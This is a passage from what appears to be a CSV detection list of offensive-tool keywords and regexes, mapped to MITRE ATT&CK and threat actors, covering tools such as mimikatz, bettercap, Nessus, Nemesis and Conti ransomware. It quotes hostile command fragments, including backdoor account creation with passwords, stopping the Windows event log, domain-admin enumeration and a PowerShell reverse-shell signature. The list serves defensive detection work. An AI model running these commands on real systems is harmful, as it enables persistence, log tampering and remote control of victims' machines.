- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "*Needles without the Thread.pptx*",".{0,1000}Needles\swithout\sthe\sThread\.pptx.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*needlesift.cna*",".{0,1000}needlesift\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "*Nemesis frontend HTTP server endpoint*",".{0,1000}Nemesis\sfrontend\sHTTP\sserver\sendpoint.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis:Qwerty12345@*",".{0,1000}nemesis\:Qwerty12345\@.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis@nemesis.com*",".{0,1000}nemesis\@nemesis\.com.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis@nemesis.local*",".{0,1000}nemesis\@nemesis\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*NEMESIS_API_URL*",".{0,1000}NEMESIS_API_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*NEMESIS_HTTP_SERVER *",".{0,1000}NEMESIS_HTTP_SERVER\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis_post_file(*",".{0,1000}nemesis_post_file\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis-rabbitmq-discovery*",".{0,1000}nemesis\-rabbitmq\-discovery.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis-rabbitmq-discovery.default.svc.cluster.local*",".{0,1000}nemesis\-rabbitmq\-discovery\.default\.svc\.cluster\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*NemesisRabbitMQProducer*",".{0,1000}NemesisRabbitMQProducer.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*neo2john.py*",".{0,1000}neo2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*neo4jconnection.py*",".{0,1000}neo4jconnection\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*neoneggplant*",".{0,1000}neoneggplant.{0,1000}","offensive_tool_keyword","Github Username","author of RAT tools on github","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nessus* --set listen_address=127.0.0.1*",".{0,1000}nessus.{0,1000}\s\-\-set\slisten_address\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.deb*",".{0,1000}Nessus\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.dmg*",".{0,1000}Nessus\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.msi*",".{0,1000}Nessus\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.rpm*",".{0,1000}Nessus\-.{0,1000}\.rpm.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.tar.gz*",".{0,1000}Nessus\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.txz*",".{0,1000}Nessus\-.{0,1000}\.txz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessus_vulns_cleaner.rc*",".{0,1000}nessus_vulns_cleaner\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*nessuscli fetch*",".{0,1000}nessuscli\sfetch.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessuscli fix*",".{0,1000}nessuscli\sfix.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessus-updates*.tar.gz*",".{0,1000}nessus\-updates.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*net domain_controllers*",".{0,1000}net\sdomain_controllers.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net group *domain admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}domain\sadmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","net","Conti Ransomware Proxyshell PowerShell command #9","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*net group *Enterprise Admins* /dom*",".{0,1000}net\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/dom.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net group / domain *Domain Admins*",".{0,1000}net\sgroup\s\/\sdomain\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net localgroup administrators /add troll*",".{0,1000}net\slocalgroup\sadministrators\s\/add\stroll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*net localgroup administrators icebreaker*",".{0,1000}net\slocalgroup\sadministrators\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*net start SysUpdate*",".{0,1000}net\sstart\sSysUpdate.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net stop \""windows event log\""*",".{0,1000}net\sstop\s\\\""windows\sevent\slog\\\"".{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*net user /add icebreaker *",".{0,1000}net\suser\s\/add\sicebreaker\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*net user HackMe *",".{0,1000}net\suser\sHackMe\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*net users /add troll Trolololol123*",".{0,1000}net\susers\s\/add\stroll\sTrolololol123.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*net.fuzz *",".{0,1000}net\.fuzz\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.fuzz.*",".{0,1000}net\.fuzz\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.probe on",".{0,1000}net\.probe\son","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.probe on*",".{0,1000}net\.probe\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.sniff *",".{0,1000}net\.sniff\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.sniff.*",".{0,1000}net\.sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*Net.Sockets.TCPClient*Net.Security.SslStream*AuthenticateAsClient*Invoke-Expression*Out-String*",".{0,1000}Net\.Sockets\.TCPClient.{0,1000}Net\.Security\.SslStream.{0,1000}AuthenticateAsClient.{0,1000}Invoke\-Expression.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*net::alias*",".{0,1000}net\:\:alias.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::deleg*",".{0,1000}net\:\:deleg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::group*",".{0,1000}net\:\:group.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::if*",".{0,1000}net\:\:if.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::serverinfo*",".{0,1000}net\:\:serverinfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::session*",".{0,1000}net\:\:session.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::share*",".{0,1000}net\:\:share.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" 